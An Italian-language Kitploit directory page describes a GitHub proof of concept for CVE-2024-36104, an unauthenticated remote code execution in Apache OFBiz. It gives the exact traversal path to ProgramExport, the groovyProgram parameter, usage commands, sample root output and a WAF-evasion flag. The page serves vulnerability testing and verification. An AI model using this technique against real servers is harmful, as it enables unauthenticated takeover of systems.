Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-36104-PoC — PoC per CVE-2024-36104 — RCE Groovy non autenticata in Apache OFBiz (<18.12.14) tramite path traversal della view /%2e/%2e/ verso ProgramExport | Kitploit
Strumenti/GitHubGitHub/groppoxx/cve-2024-36104-poc
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed Teaming
GitHubgroppoxx/cve-2024-36104-poc

CVE-2024-36104-PoC

PoC per CVE-2024-36104 — RCE Groovy non autenticata in Apache OFBiz (<18.12.14) tramite path traversal della view /%2e/%2e/ verso ProgramExport

Vedi Repository
331 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-36104-PoC

Prova di concetto per CVE-2024-36104, una vulnerabilità di esecuzione remota di codice non autenticata in Apache OFBiz precedente alla 18.12.14.

Il ControlServlet di OFBiz risolve una vista non autenticata (forgotPassword) prima di canonicalizzare il percorso della richiesta. L'aggiunta di /%2e/%2e/ fa collassare il percorso su /webtools/control/, quindi la richiesta raggiunge la vista ProgramExport senza passare mai dal controllo di sicurezza/autorizzazione legato alla vista originale. ProgramExport esegue quindi codice Groovy arbitrario, consentendo l'esecuzione remota di comandi senza autenticazione.

Lo script racchiude il comando in uno snippet Groovy che lo esegue tramite /usr/bin/bash -lc, lo invia all'endpoint vulnerabile ed estrae l'output dall'eccezione java.lang.Exception che OFBiz restituisce nella risposta HTML.

Cosa fa

  1. Valida e normalizza l'URL di destinazione.
  2. Costruisce il percorso di traversal /%2e/%2e/ da forgotPassword a ProgramExport.
  3. Racchiude il comando in un payload Groovy eseguito tramite Bash.
  4. Invia il payload come groovyProgram all'endpoint vulnerabile.
  5. Analizza la risposta HTML ed estrae l'output del comando.
  6. In caso di errore di parsing o di errori del server, ripiega sulla risposta grezza.

Requisiti

root@kitploit:~
Python 3.8+

pip install -r requirements.txt

Pacchetti Python richiesti:

root@kitploit:~
requests
urllib3

Avvio rapido

I valori racchiusi tra parentesi angolari sono segnaposto. Sostituiscili con i tuoi valori e non includere i caratteri < o >.

root@kitploit:~
python3 cve_2024_36104.py \
  --target <TARGET_URL> \
  --command <COMMAND>

Segnaposto

root@kitploit:~
<TARGET_URL>  # Target base URL. Example: https://10.129.231.23
<COMMAND>     # Command that Bash will interpret. Example: id

Esempio completo

root@kitploit:~
python3 cve_2024_36104.py \
  --target https://10.129.231.23 \
  --command "id"

Output di esempio:

root@kitploit:~
[2026-05-17T18:20:10Z] [*] Target: https://10.129.231.23/webtools/control/forgotPassword/%2e/%2e/ProgramExport
[2026-05-17T18:20:10Z] [*] Host header sent: localhost
[2026-05-17T18:20:10Z] [*] Command: id
[2026-05-17T18:20:11Z] [*] HTTP status: 200
[2026-05-17T18:20:11Z] [*] Response size: 4213 bytes

[+] Output of: id
uid=0(root) gid=0(root) groups=0(root)

Flag opzionali

root@kitploit:~
-H, --host-header <HOST>
   Value of the Host header. Default: localhost

--prefix-view <VIEW>
   Unauthenticated view used before the /%2e/%2e/ traversal. Default: forgotPassword

--target-view <VIEW>
   View reached after the traversal. Default: ProgramExport

--endpoint <PATH>
   Full custom endpoint path, overrides --prefix-view/--target-view.

--timeout <SECONDS>
   Maximum HTTP request time. Default: 15

--obfuscate
   Send groovyProgram as \uXXXX escapes instead of plaintext, matching the
   encoding used in public write-ups to dodge naive WAF signatures.

--show-payload
   Print the generated Groovy code before sending it.

--show-response
   Print the full HTML response.

--only-final
   Hide progress logs and print only the command output.

--no-color
   Disable ANSI colors.

--debug
   Enable extra diagnostic logging.

Note

  • Interessa le versioni di Apache OFBiz precedenti alla 18.12.14.
  • Non richiede autenticazione né interazione con l'utente.
  • Se il server risponde con 502, il backend probabilmente non ha terminato prima del timeout del proxy; il comando potrebbe comunque completarsi lato server.
  • Usa --show-response per ispezionare l'HTML grezzo quando l'estrazione automatica fallisce.

Note legali

Questo PoC è destinato a test di sicurezza autorizzati, ambienti di laboratorio e verifica delle vulnerabilità. Non utilizzarlo contro sistemi senza esplicita autorizzazione.

Scarica lo strumento